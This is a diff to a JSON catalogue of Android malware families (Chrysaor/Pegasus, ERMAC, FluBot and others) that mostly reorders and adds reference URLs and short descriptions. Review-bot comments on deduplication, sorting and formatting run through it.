+ "https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://community.riskiq.com/article/85b3db8c"
+ "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
+ "https://community.riskiq.com/article/85b3db8c",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf",
+ "https://twitter.com/AndroidCerberus",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [],
"type": []
@@ -571,9 +585,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger",
- "http://blog.checkpoint.com/2017/01/24/charger-malware/",
+ "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html",
"https://www.welivesecurity.com/wp-content/uploads/2019/02/ESET_Android_Banking_Malware.pdf",
- "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
+ "http://blog.checkpoint.com/2017/01/24/charger-malware/"
],
"synonyms": [],
"type": []
@@ -586,8 +601,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.chinotto",
- "https://blog.cyble.com/2021/12/06/apt37-using-a-new-android-spyware-chinotto/",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/"
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://blog.cyble.com/2021/12/06/apt37-using-a-new-android-spyware-chinotto/"
],
"synonyms": [],
"type": []
@@ -600,67 +615,69 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor",
- "https://twitter.com/billmarczak/status/1416801439402262529",
- "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
- "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
- "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
- "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
- "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/",
- "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
- "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
- "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
- "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
- "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
- "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
- "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
- "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
- "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
- "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
- "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
- "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
- "https://thewire.in/tag/pegasus-project",
"https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/",
- "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
- "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
- "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
- "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/",
- "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
- "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
- "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
- "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
- "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
- "https://www.theguardian.com/news/series/pegasus-project",
- "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
- "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
- "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
- "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
"https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html",
- "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
- "https://twitter.com/alexanderjaeger/status/1417447732030189569",
- "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
- "https://citizenlab.ca/2021/07/amnesty-peer-review/",
- "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
- "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
- "https://objective-see.com/blog/blog_0x67.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
- "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
- "https://media.ccc.de/v/33c3-7901-pegasus_internals",
- "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
"https://citizenlab.ca/2020/12/the-great-ipwn-journalists-hacked-with-suspected-nso-group-imessage-zero-click-exploit/",
- "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
- "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
- "https://forbiddenstories.org/about-the-pegasus-project/",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
- "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
- "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
- "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
- "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
- "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
+ "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://thewire.in/tag/pegasus-project",
+ "https://www.cyjax.com/2021/10/26/mercenary-apts-an-exploration/",
+ "https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html",
+ "https://nex.sx/blog/2021/08/03/the-pegasus-project.html",
+ "https://www.lemonde.fr/projet-pegasus/article/2021/07/18/au-maroc-comme-en-france-des-journalistes-mis-sous-surveillance-avec-le-logiciel-pegasus_6088654_6088648.html",
+ "https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/",
"https://www.washingtonpost.com/investigations/interactive/2021/jamal-khashoggi-wife-fiancee-cellphone-hack/?itid=co_pegasus_5",
- "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1"
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
+ "https://www.theguardian.com/world/2021/jul/18/revealed-leak-uncovers-global-abuse-of-cyber-surveillance-weapon-nso-group-pegasus",
+ "https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/",
+ "https://thewire.in/rights/sar-geelani-pegasus-spyware-phone-messages",
+ "https://twitter.com/alexanderjaeger/status/1417447732030189569",
+ "https://www.vice.com/en/article/xgx5bw/amazon-aws-shuts-down-nso-group-infrastructure",
+ "https://www.washingtonpost.com/technology/2021/07/18/reactions-pegasus-project-nso/",
+ "https://www.washingtonpost.com/investigations/2021/07/18/takeaways-nso-pegasus-project/",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/",
+ "https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/",
+ "https://www.amnesty.org/en/latest/news/2021/07/the-pegasus-project/",
+ "https://www.reuters.com/technology/how-saudi-womans-iphone-revealed-hacking-around-world-2022-02-17/",
+ "https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://arkadiyt.com/2021/07/25/scanning-your-iphone-for-nso-group-pegasus-malware/",
+ "https://thewire.in/government/indian-army-bsf-raw-pegasus-spyware-threat",
+ "https://twitter.com/billmarczak/status/1416801439402262529",
+ "https://www.washingtonpost.com/technology/2021/07/19/apple-iphone-nso/",
+ "https://citizenlab.ca/2020/01/stopping-the-press-new-york-times-journalist-targeted-by-saudi-linked-pegasus-spyware-operator/",
+ "https://media.ccc.de/v/33c3-7901-pegasus_internals",
+ "https://threatpost.com/nso-pegasus-spyware-bans-apple-accountability/167965/",
+ "https://citizenlab.ca/2021/08/bahrain-hacks-activists-with-nso-group-zero-click-iphone-exploits/",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/",
+ "https://objective-see.com/blog/blog_0x67.html",
+ "https://www.theguardian.com/world/2021/jul/18/nso-spyware-used-to-target-family-of-jamal-khashoggi-leaked-data-shows-saudis-pegasus",
+ "https://zetter.substack.com/p/pegasus-spyware-how-it-works-and",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1",
+ "https://www.washingtonpost.com/investigations/interactive/2021/nso-spyware-pegasus-cellphones/",
+ "https://irpimedia.irpi.eu/sorveglianze-cy4gate/",
+ "https://www.trendmicro.com/en_us/research/21/i/analyzing-pegasus-spywares-zero-click-iphone-exploit-forcedentry.html",
+ "https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/",
+ "https://thewire.in/government/project-pegasus-journalists-ministers-activists-phones-spying",
+ "https://blog.zecops.com/research/the-recent-ios-0-click-cve-2021-30860-sounds-familiar-an-unreleased-write-up-one-year-later/",
+ "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-appendix-d/",
+ "https://citizenlab.ca/2022/04/peace-through-pegasus-jordanian-human-rights-defenders-and-journalists-hacked-with-pegasus-spyware/",
+ "https://forbiddenstories.org/the-pegasus-project-a-worldwide-collaboration-to-counter-a-global-crime/",
+ "https://lifars.com/2022/01/forensics-analysis-of-the-nso-groups-pegasus-spyware/",
+ "https://thewire.in/media/pegasus-project-spyware-indian-journalists",
+ "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
+ "https://forbiddenstories.org/about-the-pegasus-project/",
+ "https://www.theguardian.com/news/2021/jul/18/viktor-orban-using-nso-spyware-in-assault-on-media-data-suggests",
+ "https://github.com/AmnestyTech/investigations/tree/master/2021-07-18_nso",
+ "https://www.bleepingcomputer.com/news/security/iphones-running-latest-ios-hacked-to-deploy-nso-group-spyware/",
+ "https://citizenlab.ca/2021/07/amnesty-peer-review/",
+ "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/",
+ "https://citizenlab.ca/2021/11/palestinian-human-rights-defenders-hacked-nso-groups-pegasus-spyware/",
+ "https://www.theguardian.com/news/series/pegasus-project",
+ "https://www.washingtonpost.com/world/2021/07/19/india-nso-pegasus/",
+ "https://www.cybertrends.it/pegasus-lo-spyware-per-smartphone-come-funziona-e-come-ci-si-puo-proteggere/",
+ "https://twitter.com/HackSysTeam/status/1418223814387765258?s=20"
],
"synonyms": [
"JigglyPuff",
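Review bot: the Chrysaor `refs` list is deleted and re-emitted in a different order, so nearly every line of this hunk is a move rather than a change, and the genuinely new references (for example `"https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html"` and `"https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/"`) are hard to pick out; have the generator serialise `refs` in a stable sorted order so future syncs produce a minimal diff. The same Google write-up is also listed under two hosts, `"https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html"` and the `android-developers.googleblog.com` mirror of the same path; keep one.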
@@ -668,15 +685,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "9d7c772b-43f1-49cf-bc70-7a7cd2ed34c8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
"value": "Chrysaor"
},
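Review bot: the `related` entry linking Chrysaor to `9d7c772b-43f1-49cf-bc70-7a7cd2ed34c8` (type `similar`, estimative-language almost-certain) is removed without a replacement, and nothing else in this patch re-adds that relationship; confirm the removal is intended (the upstream source no longer asserts the link) rather than a side effect of the generator no longer emitting `related`, since consumers that correlate clusters across galaxies silently lose the edge.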
@@ -754,15 +762,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.coper",
- "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/",
- "https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
- "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
- "https://twitter.com/_icebre4ker_/status/1541875982684094465",
- "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
- "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0",
- "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html",
+ "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/",
"https://www.trendmicro.com/en_us/research/22/g/examining-new-dawdropper-banking-dropper-and-daas-on-the-dark-we.html",
- "https://cert.pl/posts/2021/12/aktywacja-aplikacji-iko/"
+ "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
+ "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
+ "https://cert-agid.gov.it/news/analisi-e-approfondimenti-tecnici-sul-malware-coper-utilizzato-per-attaccare-dispositivi-mobili/",
+ "https://twitter.com/_icebre4ker_/status/1541875982684094465",
+ "https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
+ "https://thehackernews.com/2022/04/new-octo-banking-trojan-spreading-via.html",
+ "https://news.drweb.com/show/?p=0&lng=en&i=14259&c=0",
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [
"ExobotCompact",
@@ -822,8 +831,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.cyber_azov",
"https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/",
- "https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag",
- "https://twitter.com/sekoia_io/status/1554086468104196096"
+ "https://twitter.com/sekoia_io/status/1554086468104196096",
+ "https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag"
],
"synonyms": [],
"type": []
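Review bot: the Google TAG post is listed twice in the CyberAzov `refs`, once with and once without a trailing slash (`"https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/"` and the same URL without the `/`); normalise trailing slashes before deduplicating so a single entry survives, otherwise this duplicate will be carried through every future sync.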
@@ -831,6 +840,19 @@
"uuid": "bb1821f9-eace-4e63-b55d-fc7821a6e5f1",
"value": "CyberAzov"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.daam",
+ "https://blog.cyble.com/2023/04/20/daam-android-botnet-being-distributed-through-trojanized-applications/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "37a3b62e-99da-47d7-81fb-78f745427b16",
+ "value": "DAAM"
+ },
{
"description": "",
"meta": {
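Review bot: the new `DAAM` cluster ships with `"description": ""` although the cited Cyble post is a full write-up; a one-sentence description, as the ERMAC and Fakecalls entries in this same patch provide, would make the entry useful to analysts browsing the galaxy rather than only to tooling matching on the `value`.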
@@ -893,9 +915,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.dmsspy",
+ "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/",
- "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf",
- "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf"
],
"synonyms": [],
"type": []
@@ -986,8 +1008,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
+ "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/"
],
"synonyms": [],
"type": []
@@ -1012,14 +1034,16 @@
"value": "Elibomi"
},
{
- "description": "",
+ "description": "According to Intel471, ERMAC, an Android banking trojan enables bad actors to determine when certain apps are launched and then overwrites the screen display to steal the user's credentials",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.ermac",
"https://twitter.com/ESETresearch/status/1445618031464357888",
"https://blog.cyble.com/2022/05/25/ermac-back-in-action/",
+ "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
+ "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover",
"https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html",
- "https://intel471.com/blog/rmac-2-0-perfecting-the-art-of-account-takeover"
+ "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace"
],
"synonyms": [],
"type": []
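Review bot: the new ERMAC description has a grammar slip and no terminating punctuation: `"According to Intel471, ERMAC, an Android banking trojan enables bad actors ..."` should read `ERMAC, an Android banking trojan, enables ...` and end with a period. If descriptions are pulled verbatim from Malpedia, fix the text upstream so the next sync does not reintroduce it.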
@@ -1032,9 +1056,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.eventbot",
- "https://www.youtube.com/watch?v=qqwOrLR2rgU",
"https://twitter.com/ThreatFabric/status/1240664876558823424",
- "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born"
+ "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born",
+ "https://www.youtube.com/watch?v=qqwOrLR2rgU"
],
"synonyms": [],
"type": []
@@ -1047,13 +1071,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot",
- "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/",
+ "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
+ "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
"https://www.bleepingcomputer.com/news/security/source-code-for-exobot-android-banking-trojan-leaked-online/",
+ "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/",
"https://www.bleepingcomputer.com/news/security/exobot-author-calls-it-quits-and-sells-off-banking-trojan-source-code/",
"https://blog.cyble.com/2022/03/24/coper-banking-trojan/",
- "https://threatfabric.com/blogs/octo-new-odf-banking-trojan.html",
- "https://www.bleepingcomputer.com/news/security/new-android-banking-malware-remotely-takes-control-of-your-device/",
- "https://www.bleepingcomputer.com/news/security/new-exo-android-trojan-sold-on-hacking-forums-dark-web/"
+ "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/"
],
"synonyms": [],
"type": []
@@ -1066,10 +1090,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.exodus",
- "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
- "https://securitywithoutborders.org/blog/2019/03/29/exodus.html",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store"
+ "https://motherboard.vice.com/en_us/article/eveeq4/prosecutors-investigation-esurv-exodus-malware-on-google-play-store",
+ "https://motherboard.vice.com/en_us/article/43z93g/hackers-hid-android-malware-in-google-play-store-exodus-esurv",
+ "https://securitywithoutborders.org/blog/2019/03/29/exodus.html"
],
"synonyms": [],
"type": []
@@ -1082,9 +1106,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.facestealer",
- "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html",
"https://labs.k7computing.com/index.php/facestealer-the-rise-of-facebook-credential-stealer-malware/",
- "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/"
+ "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/",
+ "https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html"
],
"synonyms": [],
"type": []
@@ -1105,16 +1129,30 @@
"uuid": "d0ae2b6b-5137-4b64-be3e-4bbc9aa007a6",
"value": "FakeAdBlocker"
},
+ {
+ "description": "According to Kaspersky, Fakecalls is a Trojan that masquerades as a banking app and imitates phone conversations with bank employees.\r\n\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakecalls",
+ "https://research.checkpoint.com/2023/south-korean-android-banking-menace-fakecalls/",
+ "https://www.kaspersky.com.au/blog/fakecalls-banking-trojan/30379/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "014aeab6-2292-4ee5-83d6-fffb0fc21423",
+ "value": "Fakecalls"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.fakespy",
- "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
"https://www.trendmicro.com/en_us/research/18/k/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang.html",
- "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/",
+ "https://www.trendmicro.com/en_us/research/18/f/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/"
+ "https://medium.com/csis-techblog/the-roamingmantis-groups-expansion-to-european-apple-accounts-and-android-devices-e6381723c681"
],
"synonyms": [],
"type": []
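Review bot: the Fakecalls description carries trailing `\r\n\r\n`, which renders as stray blank lines in the galaxy HTML; strip leading and trailing whitespace from descriptions in the generator. Trim only at the ends, since other descriptions in this file (Ginp, for example) use embedded `\r\n` deliberately as list separators.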
@@ -1137,6 +1175,32 @@
"uuid": "6c0fc7e4-4629-494f-b471-f7a8cc47c0e0",
"value": "FakeGram"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fastfire",
+ "https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5613da3a-06f5-4363-b468-0b8a03ffc292",
+ "value": "FastFire"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.fastspy",
+ "https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a5e3e217-3790-4d7c-b67a-906b9ee69034",
+ "value": "FastSpy"
+ },
{
"description": "",
"meta": {
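Review bot: `FastFire` and `FastSpy` are added with empty descriptions and an identical reference set (the Malpedia page plus the same S2W post), so nothing in the data distinguishes the two families; a short description for each would help, and if the cited source presents them as linked, this file's `related` mechanism (as used for Chrysaor elsewhere in this patch) is the place to record that relationship.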
@@ -1155,12 +1219,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.finfisher",
- "https://github.com/linuzifer/FinSpy-Dokumentation",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
"https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://github.com/linuzifer/FinSpy-Dokumentation",
"https://securelist.com/finspy-unseen-findings/104322/",
"https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/",
- "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/"
+ "https://raw.githubusercontent.com/DefensiveLabAgency/FinSpy-for-Android/master/20200806_finspy_android_analysis_public_release.pdf"
],
"synonyms": [],
"type": []
@@ -1203,43 +1267,45 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot",
- "https://medium.com/csis-techblog/the-brief-glory-of-cabassous-flubot-a-private-android-banking-botnet-bc2ed7917027",
- "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://twitter.com/alberto__segura/status/1399249798063087621?s=20",
- "https://www.f5.com/labs/articles/threat-intelligence/flubots-authors-employ-creative-and-sophisticated-techniques-to-achieve-their-goals-in-version-50-and-beyond",
- "https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/",
- "https://news.netcraft.com/archives/2021/08/17/resurgent-flubot-malware-targets-german-and-polish-banks.html",
- "https://news.netcraft.com/archives/2021/08/04/flubot-malware-spreads-to-australia.html",
- "https://www.infinitumit.com.tr/flubot-zararlisi/",
- "https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html",
- "https://twitter.com/alberto__segura/status/1395675479194095618",
+ "https://www.bitsight.com/blog/flubot-malware-persists-most-prevalent-germany-and-spain",
"https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
+ "https://twitter.com/alberto__segura/status/1399249798063087621?s=20",
+ "https://cryptax.medium.com/android-flubot-preparing-for-a-new-campaign-2f7563fc6c06",
"https://blog.fox-it.com/2022/06/29/flubot-the-evolution-of-a-notorious-android-banking-malware/",
- "https://mobile.twitter.com/alberto__segura/status/1400396365759500289",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://twitter.com/alberto__segura/status/1384840011892285440",
"https://securityintelligence.com/posts/story-of-fakechat-malware/",
- "https://www.nortonlifelock.com/blogs/research-group/flubot-targets-android-phone-users",
- "https://blog.zimperium.com/flubot-vs-zimperium/",
- "https://blog.nviso.eu/2021/04/19/how-to-analyze-mobile-malware-a-cabassous-flubot-case-study/",
- "https://twitter.com/alberto__segura/status/1404098461440659459",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
"https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon",
- "https://www.prodaft.com/m/reports/FluBot_4.pdf",
+ "https://twitter.com/alberto__segura/status/1395675479194095618",
